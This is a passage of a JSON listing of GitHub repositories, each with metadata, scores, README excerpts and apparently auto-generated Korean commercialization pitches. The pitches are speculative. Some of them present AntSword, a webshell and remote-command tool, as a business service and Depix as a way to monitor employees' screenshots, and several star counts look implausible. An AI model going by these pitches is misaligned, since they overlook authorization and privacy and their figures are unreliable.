Badge](https://img.shields.io/badge/infostart-profile-blue)](http://infostart.ru/profile/237528/)\n\n# Стек технологий для 1С\n\n<img title=\"StackTechnology\" alt=\"StackTechnology\" src=\"img/stacktechnology.png\">\n\n[<img title=\"logo1c\" alt=\"logo1c\" src=\"img/logo/logo1cm.png\">](#встроенный-язык-программирования-1спредприятия)\n[<img title=\"logo1c\" alt=\"Конфигуратор\" src=\"img/logo/Конфигуратор.png\">](#конфигуратор)\n[<img title=\"edt\" alt=\"EDT\" src=\"img/logo/edt.png\">](#1centerprise-development-tools-edt)\n[<img title=\"vcode\" alt=\"vcode\" src=\"img/logo/vcode.png\">](#visual-studio-code-vscode)\n[<img title=\"git\" alt=\"git\" src=\"img/logo/git.png\">](#git)\n[<img title=\"1cmaker\" alt=\"1cmaker\" src=\"img/logo/1cmaker.png\">](#1cmaker)\n[<img title=\"nak","composite_score":0.0385,"license_safety_tag":"safe"},{"name":"Microsoft/language-server-protocol","github_url":"https://github.com/Microsoft/language-server-protocol","stars":7,"language":"HTML","license":"CC-BY-4.0","abandonment_months":0,"description":"# Microsoft/language-server-protocol 분석\n\n## 왜 보물인가\n프로그래머들이 사용하는 코드 편집기(VS Code, Sublime 등)들이 모두 같은 언어로 대화할 수 있게 하는 국제 표준을 정의한 Microsoft의 공식 규칙서입니다.\n\n## 어디에 쓸 수 있나\n1. **코드 편집기 개발 서비스**: 회사만의 프로그래밍 도구를 ","readme_excerpt":"","composite_score":0.0384,"license_safety_tag":"unknown"},{"name":"armosec/kubescape","github_url":"https://github.com/armosec/kubescape","stars":39,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Kubescape 상용화 분석\n\n## 왜 보물인가\n클라우드 서버의 보안 문제를 자동으로 찾아주는 도구로, 기업의 데이터 유출 사고를 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소기업 IT 담당자가 웹 대시보드에 로그인해 자신의 서버 보안 상태를 월 1회 자동 점검받는 구독 서비스\n2. **내부 업무 도구**:","readme_excerpt":"[![Version](https://img.shields.io/github/v/release/kubescape/kubescape)](https://github.com/kubescape/kubescape/releases)\n[![build](https://github.com/kubescape/kubescape/actions/workflows/02-release.yaml/badge.svg)](https://github.com/kubescape/kubescape/actions/workflows/02-release.yaml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/kubescape/kubescape)](https://goreportcard.com/report/github.com/kubescape/kubescape)\n[![Gitpod Ready-to-Code](https://img.shields.io/badge/Gitpod-Ready--to--Code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/kubescape/kubescape)\n[![GitHub](https://img.shields.io/github/license/kubescape/kubescape)](https://github.com/kubescape/kubescape/blob/master/LICENSE)\n[![CNCF](https://shields.io/badge/CNCF-Incubating%20project-blue?logo=linux-foundation&style=flat)](https://landscape.cncf.io/?item=provisioning--security-compliance--kubescape)\n[![Artifact HUB](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/kube","composite_score":0.0384,"license_safety_tag":"safe"},{"name":"felixonmars/dnsmasq-china-list","github_url":"https://github.com/felixonmars/dnsmasq-china-list","stars":5,"language":"Ruby","license":"NOASSERTION","abandonment_months":0,"description":"# felixonmars/dnsmasq-china-list 상용화 분석\n\n## 왜 보물인가\n중국 내 인터넷 접근을 최적화하는 핵심 데이터로, 네트워크 관리자와 ISP에게 필수 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 사용자 대상 VPN/프록시 서비스 제공업체가 연결 속도 개선 기술로 패키징\n2. **내부 업무 도구**: 중","readme_excerpt":"dnsmasq-china-list\n==================\n\nChinese-specific configuration to improve your favorite DNS server. Best partner for chnroutes.\n\n- Improve resolve speed for Chinese domains.\n\n- Get the best CDN node near you whenever possible, but don't compromise foreign CDN results so you also get best CDN node for your VPN at the same time.\n\n- Block ISP ads on NXDOMAIN result (like 114so).\n\nDetails\n=======\n\n- `accelerated-domains.china.conf`: General domains to be accelerated.\n\n  These domains have a better resolving speed and/or result when using a Chinese DNS server.\n\n  To determine if a domain is eligible, one of the criteria below must be met:\n\n - The domain's NS server is located in China mainland.\n\n - The domain will resolve to an IP located in China mainland when using a Chinese DNS server, but _not_ always do when using a foreign DNS server (For example, CDN accelerated sites that have node in China). This however does _not_ include those having node _near_ China mainland, like in Jap","composite_score":0.0384,"license_safety_tag":"unknown"},{"name":"awslabs/gluon-ts","github_url":"https://github.com/awslabs/gluon-ts","stars":9,"language":"Python","license":"Apache-2.0","abandonment_months":1,"description":"# GluonTS 사업화 분석\n\n## 왜 보물인가\n미래 수요를 자동으로 예측하는 AI 기술로, 소매·제조·금융 등 모든 비즈니스에서 재고 관리와 자금 계획을 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 소매점이 월 구독으로 사용하는 '수요 예측 솔루션' (온라인 대시보드 제공)\n- **내부 업무 도구**: 대형 유통사","readme_excerpt":"<img class=\"hide-on-website\" height=\"100px\" src=\"https://ts.gluon.ai/dev/_static/gluonts.svg\">\n\n# GluonTS - Probabilistic Time Series Modeling in Python\n\n[![PyPI](https://img.shields.io/pypi/v/gluonts.svg?style=flat-square&color=b75347)](https://pypi.org/project/gluonts/)\n[![GitHub](https://img.shields.io/github/license/awslabs/gluonts.svg?style=flat-square&color=df7e66)](./LICENSE)\n[![Static](https://img.shields.io/static/v1?label=docs&message=stable&color=edc775&style=flat-square)](https://ts.gluon.ai/)\n[![Static](https://img.shields.io/static/v1?label=docs&message=dev&color=edc775&style=flat-square)](https://ts.gluon.ai/dev/)\n[![PyPI Downloads](https://static.pepy.tech/badge/gluonts/month)](https://pepy.tech/projects/gluonts)\n\n**📢 BREAKING NEWS**: We released **Chronos**, a suite of pretrained models for zero-shot time series forecasting. Chronos can generate accurate probabilistic predictions for new time series not seen during training. Check it out [here](https://github.com/amazo","composite_score":0.0384,"license_safety_tag":"safe"},{"name":"zeromq/zeromq.js","github_url":"https://github.com/zeromq/zeromq.js","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# ZeroMQ JavaScript 저장소 분석\n\n## 왜 보물인가\n컴퓨터들 간에 빠르고 안정적으로 메시지를 주고받을 수 있는 기술로, 대규모 시스템에서 수백만 건의 거래를 동시에 처리해야 하는 금융·물류 기업들에게 매우 필요합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 데이터 분석 SaaS**\n주식 시세, 암호화폐, 스포츠 경기 결과 등을 실시간으","readme_excerpt":"# ZeroMQ.js Next Generation\n\n[![Latest version](https://img.shields.io/npm/v/zeromq?label=version)](https://www.npmjs.com/package/zeromq)\n\n[ØMQ](http://zeromq.org) bindings for Node.js. The goals of this library are:\n\n- Semantically similar to the [native](https://github.com/zeromq/libzmq) ØMQ\n  library, while sticking to JavaScript idioms.\n- Use modern JavaScript and Node.js features such as `async`/`await` and async\n  iterators.\n- High performance.\n- Fully usable with TypeScript (3+).\n- Compatible with Zeromq 4/5 via \"zeromq/v5-compat\"\n- Secure Curve protocol with Libsodium\n- Zeromq Draft API support\n\n## Useful links\n\n- [ZeroMQ.js API reference](http://zeromq.github.io/zeromq.js/modules.html).\n- [ZeroMQ project documentation](https://zeromq.org/get-started/).\n  - **Note:** The Node.js examples on zeromq.org do not yet reflect the new API,\n    but [the Guide](http://zguide.zeromq.org) in particular is still a good\n    introduction to ZeroMQ for new users.\n\n## Table of contents\n\n- [Zer","composite_score":0.0383,"license_safety_tag":"safe"},{"name":"returntocorp/semgrep","github_url":"https://github.com/returntocorp/semgrep","stars":7,"language":"OCaml","license":"LGPL-2.1","abandonment_months":0,"description":"# Semgrep 상용화 분석\n\n## 왜 보물인가\n코드의 보안 문제와 버그를 자동으로 찾아주는 도구로, 모든 소프트웨어 회사가 필수적으로 필요한 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 코드 검사 플랫폼으로 개발사들이 구독해서 자동으로 코드 품질을 점검\n2. **내부 업무 도구**: 대기업 개발팀의 내부 시스템으","readme_excerpt":"<br />\n<p align=\"center\">\n  <a href=\"https://semgrep.dev\">\n    <picture>\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"images/semgrep-logo-light.svg\">\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"images/semgrep-logo-dark.svg\">\n      <img src=\"https://raw.githubusercontent.com/semgrep/semgrep/develop/images/semgrep-logo-light.svg\" height=\"100\" alt=\"Semgrep logo\"/>\n    </picture>\n  </a>\n</p>\n<h2 align=\"center\">\n  Code scanning at ludicrous speed.\n</h2>\n<p align=\"center\">\n  <a href=\"https://formulae.brew.sh/formula/semgrep\">\n    <img src=\"https://img.shields.io/homebrew/v/semgrep?style=flat-square\" alt=\"Homebrew\" />\n  </a>\n  <a href=\"https://pypi.org/project/semgrep/\">\n    <img alt=\"PyPI\" src=\"https://img.shields.io/pypi/v/semgrep?style=flat-square&color=blue\">\n  </a>\n  <a href=\"https://semgrep.dev/docs/\">\n      <img src=\"https://img.shields.io/badge/docs-semgrep.dev-purple?style=flat-square\" alt=\"Documentation\" />\n  </a>\n  <a href=\"https://go.semgrep.dev/slack","composite_score":0.0383,"license_safety_tag":"restricted"},{"name":"duffn/dumb-password-rules","github_url":"https://github.com/duffn/dumb-password-rules","stars":5,"language":"Nunjucks","license":"MIT","abandonment_months":2,"description":"# duffn/dumb-password-rules 분석\n\n## 왜 보물인가\n비합리적인 암호 규칙(특수문자 강제, 자주 변경 요구 등)이 실제로는 보안을 약화시킨다는 점을 보여주는 교육용 자료로, 기업의 잘못된 보안 정책을 개선하는 데 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 교육 SaaS**: HR팀과 IT팀이 직원들에게 올바른 ","readme_excerpt":"# Dumb Password Rules\n\nhttps://dumbpasswordrules.com\n\nA compilation of sites with dumb password rules.\n\n⭐️ Now with a bot that periodically post random rules!\n\n- Mastodon: https://infosec.exchange/@dumbpasswordrules\n- Blue Sky: https://bsky.app/profile/dumbpasswordrules.bsky.social\n\n## Contributing\n\n### New sites\n\nFeel free to submit a pull request with dumb password rules you've encountered!\n\nYou can find more details in the [contributing doc](CONTRIBUTING.md).\n\n_Note:_ If you found your way here and don't know what GitHub is or how to work with it, you can even just [message me on Mastodon](https://fosstodon.org/@duffn) with your site and I'll get it in myself! Please include:\n\n- The name of your site.\n- A link to the page with the offending rule.\n- A screenshot of the rule.\n- A written description of the rule.\n\nYou can see what some of the other rules look like [https://dumbpasswordrules.com](https://dumbpasswordrules.com).\n\n### Code\n\nPlease also submit improvements, updates, or bug","composite_score":0.0383,"license_safety_tag":"safe"},{"name":"alibaba/AliSQL","github_url":"https://github.com/alibaba/AliSQL","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# AliSQL 상용화 분석 보고서\n\n## 왜 보물인가\n알리바바가 만든 데이터베이스 기술로, 대규모 온라인 거래 처리에 최적화되어 있어 전 세계 기업들의 데이터 관리 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업용 클라우드 데이터베이스 관리 플랫폼으로 월 구독료 모델 운영\n- **내부 업무 도구**: 대규모 전","readme_excerpt":"<p align=\"center\">\n  <img src=\"./alisql-logo.png\" width=\"180\" alt=\"AliSQL Logo\"/>\n</p>\n\n<h1 align=\"center\">AliSQL</h1>\n\n<p align=\"center\">\n  <strong>Alibaba's Enterprise MySQL Branch with DuckDB OLAP & Native Vector Search</strong>\n</p>\n\n<p align=\"center\">\n  <em>Battle-tested in Alibaba's production environment, powering millions of databases</em>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/alibaba/AliSQL/stargazers\"><img src=\"https://img.shields.io/github/stars/alibaba/AliSQL?style=for-the-badge&logo=github&color=ffca28\" alt=\"GitHub Stars\"></a>\n  <a href=\"https://github.com/alibaba/AliSQL/network/members\"><img src=\"https://img.shields.io/github/forks/alibaba/AliSQL?style=for-the-badge&logo=github&color=8bc34a\" alt=\"GitHub Forks\"></a>\n  <a href=\"https://github.com/alibaba/AliSQL/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/License-GPL%202.0-blue?style=for-the-badge\" alt=\"License\"></a>\n  <a href=\"https://github.com/alibaba/AliSQL/releases\"><img src=\"https://img","composite_score":0.0383,"license_safety_tag":"unknown"},{"name":"beurtschipper/Depix","github_url":"https://github.com/beurtschipper/Depix","stars":87,"language":"Python","license":"NOASSERTION","abandonment_months":1,"description":"# Depix 저장소 분석\n\n## 왜 보물인가\n흐릿하게 처리된 화면 캡처나 사진에서 숨겨진 텍스트와 정보를 복원하는 기술로, 개인정보 보호나 보안 검증에 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **보안 감사 서비스**: 기업들이 직원들의 스크린샷에서 실수로 노출된 민감정보를 찾아내는 감시 도구\n- **개인정보 보호 솔루션**: 마스킹된 이미지가 실","readme_excerpt":"# Depix\nMigrated to https://codeberg.org/spipm/Depixelization_poc/\n","composite_score":0.0382,"license_safety_tag":"unknown"},{"name":"bali182/autocomplete-json","github_url":"https://github.com/bali182/autocomplete-json","stars":9,"language":"JavaScript","license":"mit","abandonment_months":3,"description":"# autocomplete-json 상용화 분석\n\n## 왜 보물인가\n사용자가 입력하는 데이터를 자동으로 완성해주는 기술로, 모든 온라인 서비스에서 사용자 경험을 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 검색 기능이 있는 클라우드 협업 도구(노션, 아사나 같은)에서 사용자가 입력할 때마다 관련 데이터를 자동 제","readme_excerpt":"# autocomplete-json\r\n** Semantic autocompletion for JSON files**\r\n\r\n## for dotfiles (.eslintrc, .babelrc, etc)\r\n[autocomplete-plus](https://github.com/atom/autocomplete-plus) (this package is a plugin for autocomplete-plus) has dotfiles disabled by default for autocompletion. To enable them, go to\r\n`File` -> `Settings` -> `Packages` -> `autocomplete-plus` -> `Settings` -> `File Blacklist` and replace the default `.*` with something that you won't need to be \r\nrecognized as a filename in files you expect autocomplete, eg.: a `space` (`\" \"` without quotes). If this still doesn't do the trick, make sure Atom recognizes file type correctly - for me `.eslintrc` was recognized as `YAML` - change it to `JSON` if necessary. If this still doesn't help, please open an issue, or feel free to protest against\r\nblocking dotfiles here: https://github.com/atom/autocomplete-plus/issues/658\r\n\r\n## how this works\r\nSince 5.0 (it supposed to be 2.0 but I messed up `apm publish`) was released, this is the wa","composite_score":0.038,"license_safety_tag":"safe"},{"name":"ykfe/ssr","github_url":"https://github.com/ykfe/ssr","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# ykfe/ssr 프로젝트 분석\n\n## 왜 보물인가\n웹사이트가 검색 엔진에 잘 노출되도록 하는 기술이 담겨 있어서, 온라인 비즈니스의 가시성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 전자상거래 플랫폼이 검색 결과에서 상품이 더 잘 보이도록 해주는 최적화 서비스\n- **내부 업무 도구**: 대형 웹사이트를 운영하는 ","readme_excerpt":"<div>\n<a href=\"./README_Zh.md\">简体中文</a> ｜ English\n</div>\n\n<h1 align=\"center\"> SSR </h1>\n<div align=\"center\">\n  <img src=\"https://gw.alicdn.com/tfs/TB1ckATCGL7gK0jSZFBXXXZZpXa-540-540.jpg\" width=\"300\" />\n</div>\n<br />\n\n<div align=\"center\">\n  <strong>A most advanced ssr framework on Earth that implemented serverless-side render specification for faas and traditional web server.</strong>\n</div>\n<br />\n<div align=\"center\">\n<a href=\"https://github.com/zhangyuang/ssr/actions\" target=\"_blank\"><img src=\"https://github.com/zhangyuang/ssr/workflows/CI/badge.svg\" alt=\"githubActions\" />\n<a href=\"https://www.cypress.io/\" target=\"_blank\"><img src=\"https://img.shields.io/badge/cypress-dashboard-brightgreen.svg\" alt=\"cypress\" />\n<a href=\"https://github.com/zhangyuang/ssr\" target=\"_blank\"><img src=\"https://img.shields.io/badge/node-%3E=20-green.svg?color=4dc71f\" alt=\"Node\" ></a>\n<a href=\"https://github.com/zhangyuang/ssr\" target=\"_blank\"><img src=\"https://img.shields.io/github/stars/zhangyuang/ssr.svg?","composite_score":0.038,"license_safety_tag":"safe"},{"name":"oceanbase/obdeploy","github_url":"https://github.com/oceanbase/obdeploy","stars":19,"language":"Python","license":"Apache-2.0","abandonment_months":2,"description":"# OceanBase obdeploy 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터베이스 시스템을 자동으로 설치하고 관리해주는 도구로, 기업들이 IT 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 데이터베이스 관리 플랫폼으로, 중소기업이 별도의 전문가 없이 대규모 데이터를 다룰 수 있도록 제공","readme_excerpt":"# OceanBase Deployer\n\n<!--\n# coding: utf-8\n# Copyright (c) 2025 OceanBase.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n-->\n\n<!-- TODO: some badges here -->\n\nOceanBase Deployer (OBD) is an installation and deployment tool for open-source OceanBase software. It is also a package manager for managing all open-source OceanBase software. This topic describes how to install OBD, how to use OBD, and OBD commands.\n\n## Install OBD\n\nYou can install OBD by using these methods:\n\n### Method 1: Install OBD ","composite_score":0.038,"license_safety_tag":"safe"},{"name":"lra/mackup","github_url":"https://github.com/lra/mackup","stars":5,"language":"Python","license":"gpl-3.0","abandonment_months":0,"description":"# lra/mackup 분석 보고서\n\n## 왜 보물인가\n컴퓨터의 중요한 설정과 파일들을 자동으로 백업하고 여러 기기에서 동기화해주는 도구로, 실수로 인한 데이터 손실을 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인용 클라우드 백업 플랫폼으로, 사용자들이 구독 형태로 자동 백업 서비스를 이용하도록 판매\n2. **내부 업","readme_excerpt":"# Mackup™\n\n[![Tests](https://github.com/lra/mackup/actions/workflows/test.yaml/badge.svg)](https://github.com/lra/mackup/actions/workflows/test.yaml)\n[![PyPI version](https://badge.fury.io/py/mackup.svg)](https://badge.fury.io/py/mackup)\n[![Python Versions](https://img.shields.io/pypi/pyversions/mackup.svg)](https://pypi.org/project/mackup/)\n[![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff)\n[![mypy](https://img.shields.io/badge/mypy-checked-blue)](http://mypy-lang.org/)\n[![License](https://img.shields.io/github/license/lra/mackup.svg)](https://github.com/lra/mackup/blob/master/LICENSE)\n\nBackup and keep your application settings in sync.\n\n## Table of contents\n\n- [Mackup™](#mackup)\n  - [Table of contents](#table-of-contents)\n  - [Quickstart](#quickstart)\n  - [Usage](#usage)\n  - [What does it do](#what-does-it-do)\n    - [Copy mode](#copy-mode)\n    - [Link mode](#link-mode)\n      - [`","composite_score":0.0379,"license_safety_tag":"restricted"},{"name":"marpple/FxTS","github_url":"https://github.com/marpple/FxTS","stars":6,"language":"TypeScript","license":"Apache-2.0","abandonment_months":2,"description":"# FxTS 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 간단하게 처리할 수 있는 도구를 제공하여, 프로그래머가 더 빠르고 효율적으로 일할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 고객사의 대량 판매 기록을 빠르게 정렬하고 분류하는 온라인 서비스로 운영\n2. **내부 업무 도구**: 회사의 재고 관리 시스템에 적","readme_excerpt":"<img src=\"./website/docs/public/img/fxts.png\" alt=\"FxTS Logo\" width=\"120\" />\n\n# FxTS\n\n[![Build Status](https://github.com/marpple/FxTS/actions/workflows/ci.yml/badge.svg)](https://github.com/marpple/FxTS/actions)\n[![npm version](https://badge.fury.io/js/@fxts%2Fcore.svg)](https://www.npmjs.com/package/@fxts/core)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](./LICENSE)\n\nFxTS is a functional programming library for TypeScript.\n\n- Provides [lazy evaluation](https://fxts.dev/guide/lazy-evaluation) for memory-efficient data processing with functions like [pipe](https://fxts.dev/api/pipe), [map](https://fxts.dev/api/map), [filter](https://fxts.dev/api/filter), and [take](https://fxts.dev/api/take).\n- Handles [concurrent requests](https://fxts.dev/guide/handle-concurrency) efficiently with [concurrent](https://fxts.dev/guide/concurrent) and [toAsync](https://fxts.dev/api/toAsync).\n- Offers excellent TypeScript support with strong type inference.\n- Follows standard ","composite_score":0.0379,"license_safety_tag":"safe"},{"name":"JrCs/docker-letsencrypt-nginx-proxy-companion","github_url":"https://github.com/JrCs/docker-letsencrypt-nginx-proxy-companion","stars":6,"language":"Shell","license":"mit","abandonment_months":1,"description":"# JrCs/docker-letsencrypt-nginx-proxy-companion 분석\n\n## 왜 보물인가\n인터넷 사이트를 안전하게 운영하기 위해 필요한 보안 인증서를 자동으로 발급받고 갱신해주는 도구로, 웹사이트 운영자의 번거로운 관리 작업을 없애줍니다.\n\n## 어디에 �'쓸 수 있나\n- **SaaS 서비스**: 여러 고객의 웹사이트를 한 번에 관리하","readme_excerpt":"[![Tests](https://github.com/nginx-proxy/acme-companion/actions/workflows/test.yml/badge.svg)](https://github.com/nginx-proxy/acme-companion/actions/workflows/test.yml)\r\n[![GitHub release](https://img.shields.io/github/release/nginx-proxy/acme-companion.svg)](https://github.com/nginx-proxy/acme-companion/releases)\r\n[![Docker Image Size](https://img.shields.io/docker/image-size/nginxproxy/acme-companion?sort=semver)](https://hub.docker.com/r/nginxproxy/acme-companion \"Click to view the image on Docker Hub\")\r\n[![Docker stars](https://img.shields.io/docker/stars/nginxproxy/acme-companion.svg)](https://hub.docker.com/r/nginxproxy/acme-companion \"Click to view the image on Docker Hub\")\r\n[![Docker pulls](https://img.shields.io/docker/pulls/nginxproxy/acme-companion.svg)](https://hub.docker.com/r/nginxproxy/acme-companion \"Click to view the image on Docker Hub\")\r\n\r\n**acme-companion** is a lightweight companion container for [**nginx-proxy**](https://github.com/nginx-proxy/nginx-proxy).\r\n\r\nIt ","composite_score":0.0379,"license_safety_tag":"safe"},{"name":"stevenlovegrove/Pangolin","github_url":"https://github.com/stevenlovegrove/Pangolin","stars":5,"language":"C++","license":"mit","abandonment_months":0,"description":"# Pangolin 저장소 분석\n\n## 왜 보물인가\n복잡한 3D 시각화 작업을 간단하게 만들어주는 강력한 도구로, 게임·영상·과학 분야에서 전문가들이 선호하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 3D 시각화 SaaS 서비스**\n- 브라우저에서 건축 설계도나 과학 데이터를 3D로 보여주는 웹 서비스 제공\n\n**2. 게임 개발사 내부","readme_excerpt":"What is Pangolin\n====================================\n\nPangolin is a set of lightweight and portable utility libraries for prototyping 3D, numeric or video based programs and algorithms. It is used quite widely in the field of Computer Vision as a means to remove platform-specific boilerplate and make it easy to visualize data.\n\nThe general ethos of Pangolin is to minimize boilerplate and maximize portability and flexibility through simple interfaces and factories over things like windowing and video. It also offers a suite of utilities for interactive debugging, such as 3D manipulation, plotters, tweak variables, and a drop-down Quake-like console for python scripting and live tweaking.\n\n\n\n## Main features\n\n* Cross Platform Windowing\n  * Build for **Windows**, **Linux**, **OSX** and the **Web** (with [Emscripten](https://emscripten.org/))\n  * Support different windowing implementations including off-screen buffers\n* Viewport Management and Interaction\n  * Simple and performant viewpor","composite_score":0.0378,"license_safety_tag":"safe"},{"name":"share/sharedb","github_url":"https://github.com/share/sharedb","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# ShareDB 저장소 분석\n\n## 왜 보물인가\n여러 사람이 동시에 같은 문서를 편집할 때 충돌 없이 자동으로 정리해주는 기술로, 협업 도구의 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n1. **협업 문서 편집 SaaS**: Google Docs 같은 실시간 공동 편집 서비스의 백엔드 기술로 활용\n2. **팀 프로젝트 관리 도구**: 여러 팀원이 동시에","readme_excerpt":"# ShareDB\n\n  [![NPM Version](https://img.shields.io/npm/v/sharedb.svg)](https://npmjs.org/package/sharedb)\n  ![Test](https://github.com/share/sharedb/workflows/Test/badge.svg)\n  [![Coverage Status](https://coveralls.io/repos/github/share/sharedb/badge.svg?branch=master)](https://coveralls.io/github/share/sharedb?branch=master)\n\nShareDB is a realtime database backend based on [Operational Transformation\n(OT)](https://en.wikipedia.org/wiki/Operational_transformation) of JSON\ndocuments. It is the realtime backend for the [DerbyJS web application\nframework](http://derbyjs.com/).\n\nFor help, questions, discussion and announcements, join the [ShareJS mailing\nlist](https://groups.google.com/forum/?fromgroups#!forum/sharejs) or [read the documentation](https://share.github.io/sharedb/\n).\n\nPlease report any bugs you find to the [issue\ntracker](https://github.com/share/sharedb/issues).\n\n## Features\n\n - Realtime synchronization of any JSON document\n - Concurrent multi-user collaboration\n - Synchro","composite_score":0.0377,"license_safety_tag":"unknown"},{"name":"paypal/downshift","github_url":"https://github.com/paypal/downshift","stars":5,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# Downshift 저장소 분석\n\n## 왜 보물인가\n웹사이트의 검색창이나 드롭다운 메뉴에서 자동완성 기능을 손쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **이커머스 SaaS**: 온라인 쇼핑몰에 상품 검색 자동완성 기능을 제공하는 클라우드 서비스\n- **HR 관리 도구**: 기업 직원 정보 시스템에서 직급/부서 검색 자동완성 내장\n- ","readme_excerpt":"<h1 align=\"center\">\n  downshift 🏎\n  <br>\n  <img src=\"https://raw.githubusercontent.com/downshift-js/downshift/master/other/public/logo/downshift.svg\" alt=\"downshift logo\" title=\"downshift logo\" width=\"300\">\n  <br>\n</h1>\n<p align=\"center\" style=\"font-size: 1.2rem;\">Primitives to build simple, flexible, WAI-ARIA compliant React\nautocomplete, combobox or select dropdown components.</p>\n\n> [Read the docs](https://downshift-js.com) |\n> [See the intro blog post](https://kentcdodds.com/blog/introducing-downshift-for-react)\n> |\n> [Listen to the Episode 79 of the Full Stack Radio podcast](https://fullstackradio.com/79)\n\n<hr />\n\n[![Build Status][build-badge]][build]\n[![Code Coverage][coverage-badge]][coverage]\n[![downloads][downloads-badge]][npmcharts] [![version][version-badge]][package]\n[![MIT License][license-badge]][license]\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-113-orange.svg?style=flat-square)](#contributors)\n[![PRs Welcome][prs-badge]][prs] [![Chat][chat-badg","composite_score":0.0377,"license_safety_tag":"safe"},{"name":"AntSwordProject/antSword","github_url":"https://github.com/AntSwordProject/antSword","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# AntSword 프로젝트 분석\n\n## 왜 보물인가\n웹사이트나 서버에 접근한 후 원격으로 명령을 실행할 수 있는 도구로, 보안 테스트나 시스템 관리 자동화가 필요한 기업들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 진단 서비스**\n- 보안업체가 고객사의 웹서버 취약점을 찾아주는 유료 진단 서비스에 활용\n- 월 수십만~수백만 원의","readme_excerpt":"# AntSword [![release](https://img.shields.io/badge/release-v2.1.16-blue.svg?style=flat-square)][url-release]\n\n> AntSword in your hands, no worries in your mind！\n\n**AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.**\n\n**Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.**\n\nThis software, of which the development thought is modularization, is intended to provide easy-to-understand codes and modification guidelines for users of different levels. Therefore, any contribution making by everyone to this project is encouraged, whether large or small. By doing so, this tool can be more convenient and consequently become your most powerful kit！\n\n[中文说明][url-doczh] / [Document][url-document] / [Ch","composite_score":0.0376,"license_safety_tag":"safe"},{"name":"lervag/wiki.vim","github_url":"https://github.com/lervag/wiki.vim","stars":6,"language":"Vim Script","license":"MIT","abandonment_months":2,"description":"# wiki.vim 상업화 분석\n\n## 왜 보물인가\n글을 쓰고 정리하는 것을 좋아하는 사람들이 자신의 개인 위키(지식 저장소)를 텍스트 에디터 안에서 직접 만들고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 팀 지식 관리 SaaS**\n회사의 문서, 회의록, 업무 매뉴얼을 한곳에 모아 직원들이 쉽게 찾을 수 있는 구독형 서비스로 판매 가","readme_excerpt":"# Introduction\n\nThis is a [Vim](http://www.vim.org/) and [neovim](https://neovim.io/) plugin\nfor writing and maintaining a personal wiki. The plugin was initially based on\n[vimwiki](https://github.com/vimwiki/vimwiki), but it is written mostly from\nscratch and is based on a more \"do one thing and do it well\" philosophy.\n\nThis README file contains basic information on how to get started, as well as\na list of available features. For more details, please read the\n[full documentation](doc/wiki.txt).\n\n> [!NOTE]\n>\n> `wiki.vim` is _not_ a filetype plugin. It is designed to be used _with_\n> filetype plugins, e.g. dedicated Markdown plugins. Users are advised to read\n> `:help wiki-intro-plugins` for a list of plugins that work well with\n> `wiki.vim`.\n\n> [!WARNING]\n>\n> `wiki.vim` requires Vim 9.1 or Neovim 0.10!\n\n## Table of contents\n\n- [Quick Start](#quick-start)\n- [Features](#features)\n- [Acknowledgements](#acknowledgements)\n- [Alternatives](#alternatives)\n\n# Quick Start\n\n## Installation\n\nTher","composite_score":0.0376,"license_safety_tag":"safe"},{"name":"CarterCommunity/Carter","github_url":"https://github.com/CarterCommunity/Carter","stars":8,"language":"C#","license":"MIT","abandonment_months":2,"description":"# Carter 